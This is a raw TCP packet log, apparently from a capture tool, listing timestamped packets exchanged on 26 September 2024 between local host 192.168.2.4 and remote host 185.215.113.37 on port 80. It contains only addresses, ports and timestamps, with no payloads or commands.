Sep 26, 2024 18:27:13.071417093 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.071425915 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.071439981 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.071453094 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.071465969 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.071471930 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.071480989 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.071490049 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.071495056 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.071510077 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.071516991 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.071522951 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.071537971 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.071552038 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.071556091 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.071602106 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.098586082 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.098601103 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.098622084 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.098634958 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.098648071 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.098649979 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.098664999 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.098685026 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.098695993 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.098732948 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.098764896 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.098779917 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.098794937 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.098808050 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.098812103 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.098824024 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.098840952 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.098850965 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.098855972 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.098870039 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.098885059 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.098892927 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.098915100 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.098931074 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.098936081 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.098975897 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.099080086 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.099093914 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.099101067 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.099113941 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.099127054 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.099138021 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.099142075 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.099157095 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.099169970 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.099178076 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.099184036 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.099200964 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.099209070 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.099227905 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.099251986 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.099452972 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.099466085 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.099484921 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.099489927 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.099495888 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.099502087 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.099508047 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.099541903 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.099581003 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.119282007 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.119316101 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.119348049 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.119354010 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.119381905 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.119405031 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.119462967 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.119493961 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.119525909 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.119534016 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.119559050 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.119568110 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.119594097 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.119604111 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.119637966 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.119721889 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.119776011 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.119785070 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.119817019 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.119832039 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.119868040 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.120187998 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.120219946 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.120235920 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.120294094 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.120295048 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.120327950 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.120342970 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.120359898 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.120382071 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.120392084 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.120413065 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.120431900 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.120435953 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.120464087 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.120491982 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.120495081 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.120517969 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.120527983 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.120543957 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.120575905 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.120577097 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.120609045 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.120628119 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.120640993 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.120655060 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.120671988 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.120686054 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.120702982 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.120718002 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.120737076 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.120748997 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.120780945 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.120788097 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.120800972 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.120827913 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.120831013 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.120853901 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.120867014 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.120874882 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.120903015 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.120912075 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.120913982 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.120943069 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.120946884 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.120965004 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.120979071 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.120991945 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.121023893 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.180408001 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.185487986 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.399876118 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.399912119 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.399925947 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.399949074 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.399955988 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.399964094 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.399979115 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.399986029 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.399995089 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.400017977 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.400031090 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.400046110 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.400058985 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.400063992 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.400074959 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.400089025 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.400091887 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.400106907 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.400116920 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.400120020 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.400141001 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.400177956 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.400654078 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.400669098 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.400684118 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.400701046 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.400707960 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.400716066 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.400732040 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.400739908 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.400779963 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.400779963 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.400795937 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.400810003 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.400825024 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.400825977 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.400841951 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.400870085 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.400907993 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.401320934 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.401335001 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.401349068 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.401364088 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.401377916 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.401392937 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.401421070 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.401433945 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.401436090 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.401468992 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.401505947 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.401526928 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.401541948 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.401570082 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.401596069 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.401747942 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.401792049 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.401806116 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.401815891 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.401832104 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.401860952 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.401956081 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.401969910 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.401983976 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.401998043 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.402013063 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.402014971 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.402044058 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.402066946 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.402080059 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.402081013 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.402097940 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.402111053 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.402116060 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.402126074 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.402138948 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.402144909 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.402154922 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.402168989 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.402183056 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.402189970 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.402198076 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.402213097 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.402218103 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.402241945 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.402266979 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.402587891 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.402601957 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.402615070 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.402641058 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.402650118 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.402672052 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.402673960 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.402695894 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.402709007 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.402728081 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.402754068 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.402762890 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.402796984 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.402810097 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.402828932 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.402843952 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.402868986 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.402873039 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.402911901 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.402916908 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.402956963 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.402957916 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.403002977 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.403162003 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.403212070 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.403245926 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.403265953 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.403276920 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.403306007 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.403311014 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.403340101 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.403343916 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.403358936 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.403403997 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.403407097 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.403455973 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.403523922 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.403538942 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.403570890 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.403599977 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.403641939 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.403656006 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.403670073 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.403704882 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.403733969 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.403747082 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.403750896 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.403768063 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.403778076 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.403814077 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.523574114 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.523649931 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.523659945 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.523691893 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.523719072 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.523725986 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.523756981 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.523761034 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.523776054 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.523809910 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.523897886 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.523976088 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.523983955 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.524007082 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.524023056 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.524051905 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.524071932 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.524106026 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.524122953 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.524137974 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.524163961 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.524199963 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.524200916 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.524249077 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.524250031 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.524285078 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.524307013 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.524329901 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.524331093 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.524363995 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.524379015 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.524395943 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.524410009 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.524488926 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.524615049 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.524646044 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.524677038 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.524708986 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.524708986 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.524741888 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.524753094 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.524774075 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.524792910 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.524808884 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.524832964 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.524841070 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.524868011 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.524885893 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.524890900 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.524924040 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.524936914 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.524955034 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.524966955 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.524986982 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.525002003 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.525032997 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.525038958 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.525070906 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.525087118 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:13.525103092 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:13.525115967 CEST	49730	80	192.168.2.4	185.215.113.37
